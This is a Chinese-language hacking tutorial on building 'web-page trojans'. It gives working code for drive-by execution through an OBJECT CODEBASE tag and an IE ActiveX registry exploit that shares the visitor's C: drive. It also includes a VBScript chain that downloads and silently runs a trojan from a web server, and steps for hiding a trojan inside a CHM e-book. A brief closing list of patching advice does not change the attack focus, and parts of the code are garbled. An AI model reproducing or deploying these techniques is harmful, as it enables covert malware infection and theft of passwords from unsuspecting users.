大家对木马都不陌生了,它可能要算是计算机病毒史上最厉害的了,相信会使木马的人千千万万,但是有很多人苦于怎么把木马发给对方,现在随着计算机的普及,在网络上我相信很少有人会再轻易的接收对方的文件了,所以网页木马诞生了。
1.它应该算是html带动同路径下的一个exe的文件的主页了,也就是当浏览器浏览这个页面的时候,一个exe的文件就在后台自动下载并执行了,可以做一个test.html的文件在桌面,内容如下:
<script language="javascript">
run_exe="<OBJECT ID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject""
run_exe+="CODEBASE="test.exe#version=1,1,1,1">"
run_exe+="<PARAM NAME="_Version" value="65536">"
run_exe+="</OBJECT>"
run_exe+="<HTML><H1>网页加载中,请稍后....</H1></HTML>";
document.open();
document.clear();
document.writeln(run_exe);
document.close();
</script>
再在桌面下随便找个exe的文件,名字一定要改为tset.exe,好了,这时候双击我们刚才生成的html文件,当看到“网页加载中,请稍后....” 的时候,我们的那个同路径下的exe文件也被无条件执行了,这种页面的优点就是编译修改简单,但是!当你申请下了一个个人主页空间的时候,把这两个文件上传上去的时候,当你试图通过浏览器浏览你的杰作的时候,ie的安全警告跳了出来,我想没有几个人愿意乖乖的冒着风险去点“是”,好了,尽管这个网页木马在本地是多么的完美,但是放到了网上就通不过ie的安全策略了,这个小马失败了。
2.是通过ie自身的漏洞写入注册表,相信很多人经常在浏览一些主页的时候,注册表被改的乱七八糟、ie标题被改、首页被改、注册表编辑器被禁用等等,这些都是自动修改了你的注册表的网页的杰作,所以我门也可以做个页面让浏览者的硬盘完全共享,也是做个html的文件,内容如下:
script language=javascript>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
Shl.RegWrite ("HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\RWC$\Flags",402,"REG_DWORD");
Shl.RegWrite ("HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\RWC$\Type",0,"REG_DWORD"
);
Shl.RegWrite ("HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\RWC$\Path","C:\");
}
function init()
{
setTimeout("f()", 1000);
}
init();
</script>
当对方的浏览过这个页面的时候,他的c:就被共享了,共享后的进入方法嘛..呵呵不用说了吧,但是他虽然共享了,但是你还不知道谁正在看你的这个页面,他的ip又是多少你都不知道,没有关系,有个很简单的方法,去163申请一个域名的转换,如:http://www.chinawww365.com连接目标地址里...这种网页木马的特点是比较安全,不易被对方发现,但是使用麻烦需要牵扯到很多的东西。
3.也是现在最好用的一种了吧,个人认为。它是将一个小巧的exe文件作成一个.eml的文件,再用ie的漏洞让一个html的页面执行这个.eml的文件,你的那个小巧的exe文件就被执行了,由于代码过长又因每个exe文件转换后的代码不同所以不可能一一写出,下面给出一个地址http://dhj.126.com实际上就是一个转...elnetx.x.x.x 3389来完全控制对方(这个5k的小后门是winshell5.0黑白网络有下,同时这个winshell5.0还有一个很出色的功能,就是能下载一个你事先设置好的指定路径下的一个文件,并执行他,我放置的是网络深偷,如果你的杀毒软件够厉害的话,神偷是可以被查出来的,这里只是实验,实际中可以指定很多查不到的小马,这里不阐述),有兴趣的朋友可以来试试。
这种网页木马的特点是,对方挨种率较高,除了制作麻烦一点外,没有什么缺点啦
好了所有的漏洞都是建立在系统漏洞的前提下,多升级多打补丁没有坏处
网页木马制作讲解
我们经常听到这样的忠告:“不要随意下在不明的程序,不要随意打开邮件的附件...”这样的忠告确实是有用的,不过我们的系统有不少漏洞,许多木马已经不需要客户端和服务端了,他们利用这些系统漏洞按照被系统认为合法的代码执行木马的功能,有的木马会在你完全不知道的情况下潜入,现在我来讲解下通过 IE6的漏洞实现访问网页后神不知鬼不觉的下在并执行指定程序的例子,也就是网页木马.
首先我们需要编写几个简单的文件
一、名字为abc.abc的文件
<html>
<script language="vbscript">
Function HttpDoGet(url)
set oreq = CreateObject("Microsoft.XMLHTTP")
oreq.open "GET",url,false
oreq.send
If oreq.status=200 then
HttpDoGet=oReq.respomseBody
Savefile HttpDoGet,"c:win.exe"
End If
Set oreq=nothing
End Function
sub SaveFile(str.fName)
Set objStream = CreateObject("ADODB.Stream")
objStream.Type =1
objStream.Open
objStream.write str
objStream.SaveToFile fName.2
objStream.Close()
set objStream = nothing
exewin()
End sub
Sub exewin()
set wshshell=createobject ("wscript.shell" )
a=wshshell.run ("cmd.exe /c c:win.exe",0)
b=wshshell.run ("cmd.exe /c del c:win.hta",0)
window.close
End Sub
HttpDoGet "http://127.0.0.1/test.exe"
</script>
</html>
其中test.exe为木马程序,实现必须放在WEB发布的目录下,文件abc.abc也必须保存在发布的目录下。
二、名字为test.htm的文件
<html><body>
木马运行测试!(这句话可以改成你想说的)
<object date="http://127.0.0.1/win.test";;;></object>
</body></html>
三、名字为win.test的文件
<html>
<body>
<script language="vbscript">
Function HttpDoGet(url)
set oreq = CreateObject("Microsoft.XMLHTTP")
oreq.open "GET",url,false
oreq.send
If oreq.status=200 then
HttpDoGet,"c:win.hta"
Set oreq=nothing
End if
end function
sub SaveFile(str,fName)
Dim fso, tf
S e t f s o = C r e a t e O b j e c t(Scripting.FileSystemObject")
Set tf = fso.CreateTextfile(fName,True)
tf.Write str
tf.Close
exewin()
End sub
Sub exewin()
set wshshell=createobject ("wscript.shell" )
a=wshshell.run ("cmd.exe /c c:win.hat",0)
window.close
End Sub
HttpDoGet("http://127.0.0.1/abc.abc")
</script>
</body>
</html>
四、名字为test.exe的木马程序。
晕...这个就不用我提供了吧,你想用什么木马就把他的名字换成test.exe传上去就可以了。
服务器的文件列表
test.htm:对外发布的网页
win.test:下在文件abc.abc到对方机器上,并且保存为win.hta并且执行。
abc.abc下载二进制的木马文件test.exe,并执行。
test.exe:木马程序。
上面所说的文件可以修改成任意名字,只是不要忘记把源码里的文件指向也修改就可以了!
最后是设置IIS,打开“程序→管理工具→internet服务管理器”,右键单击要设置的站点,选择《属性》,在选择“http头”。单击“MIME映射”里的“文件类型”按钮,并在关联扩展名文本框中输入“.hta”,在内容类型(MIME)中输入“application/hta",然后关闭所有窗口就可以了。
有许多朋友多遇见过,说什么赠送Q号或者玩网游的时候里面有人喊赠送好东东在XXX网址,其实那上面所说的例子用的就是这种原理,不知不觉中你机器上的所有有关于密码或者指定名词的东西全发送到对方指定的邮件箱里去了
看完后是否觉得这种木马太危险,甚至有种想把网线拔掉的感觉那?呵呵,其实了解了网页木马的工作原理后我们就不难防护他,看完以上内容后就可以得出一个结论,网页木马主要利用IE的漏洞来实现的,所以在预防的时候一定要做到以下几点就可以保证上网的安全了,
A、安装IE的最新版本并且随时下在才做系统和IE的补丁程序。
B、不随便登陆不熟悉朋友送来的网站,对于熟悉的朋友也要小心哦。
C、不随便登陆黑客网站(^_^黑基除外了啦,我担保的...),色情网站,尤其一些卖外挂,卖木马的网站。
D、不随便打开和预览有附件的邮件。
E、安装防火墙和杀毒软件的最新版本,经常进行升级和查毒。
电子书木马
下面就让我带大家一步步打造个超级隐蔽的电子书木马吧!
首先准备好工具如下:
1:Microsoft HTML Help Workshop V1.32
电子书制作工具,由微软公司出的编程配套软件,可以帮助您建立 HTML 格式的帮助文件!当然也可以用Quick CHM等其他CHM格式的电子书制作工具;
2:超级木马一只(也就是一个你觉得最好的木马程序一个而已,相信大家比我熟悉),本文演示用“Window 按钮突破专家”这个小软件”;
3:现在最火爆的电子书籍(大哥们,不要拿咱们菜鸟的电脑教材开刀呀!)若干,当然如果你有能力自己做我也不反对,本文演示用Windows 2000的帮助文档WINNTHelp下的access.chm开刀!
准备好了吗?开始制作吧!
第一步:
打开access.chm,在右侧的空白处,点击右键菜单,选择属性,我们可以知道这个电子文档的默认主页是:accessibility_overview.htm,标题栏文字是:辅助选项
第二步:
制作一个可以让木马运行并且同时可以自动转到原电子书的默认主页的网页icyfox.htm,代码如下:
<HTML>
<HEAD>
<meta http-equiv="refresh" content="3;url='accessibility_overview.htm'">
</HEAD>
<BODY>
<OBJECT Width=0 Height=0 style="display:none;" TYPE="application/x-oleobject" CODEBASE="Window 按钮突破专家.exe">
</OBJECT>
</BODY>
</HTML>
说明:把其中的accessibility_overview.htm改为你用的电子书的默认主页名,把“Window 按钮突破专家.exe”改为你的木马程序名!
另外,如果你的木马程序体积比较大,请相应的把上面的转向时间3改的值大一点!
在Windows 2003中默认在本地电脑域中好像并不允许OBJECT标签运行本地程序(我自己没装Windows 2003),所以不适合在Win2003使用!当然我们可以在代码中加入判断是否是Windows 2003的语句,来隐藏自己的木马!用navigator.appVersion属性判断!
第三步:
打开HTML Help Workshop,选择File菜单下的Decompile...项,对access.chm进行反编译,在反编译后的目录“G:CHM木马”中可以看到access.hhc(对应帮助文档左侧的“目录”项)和access.hhk(对应帮助文档左侧的“索引”项);
第四步:
建立一个新的带有木马的电子书;
把“Window 按钮突破专家.exe”,也就是你的木马程序复制到反编译后的目录“G:CHM木马”中,并在此目录下建立一个icyfox.hhp的文件(用记事本即可!),内容如下(注意;号后面的注释不要写上):
[OPTIONS]
Compatibility=1.1 or later
Compiled file=access.chm ;把access.chm改为你要生成的电子书名
Default Window=Main
Language=0x804 中文(中国)
[WINDOWS]
Main="辅助选项","access.hhc","access.hhk","icyfox.htm",,,,,,0x420,150,0x104E,,0x0,0x0,,,,,0
;把上面的"辅助选项"改为你第一步时得到的标题栏文字,"access.hhc"及"access.hhk"分别改为你第三步得到的文件名
[FILES]
icyfox.htm
Window 按钮突破专家.exe ;把它改为你要嵌入电子书的木马程序名
最后,用HTML Help Workshop打开icyfox.hhp,点击左侧最下面的编译按钮,稍等一会就可以在“G:CHM木马”目录中发现已经编译好的带有木马的电子书access.chm,打开看看!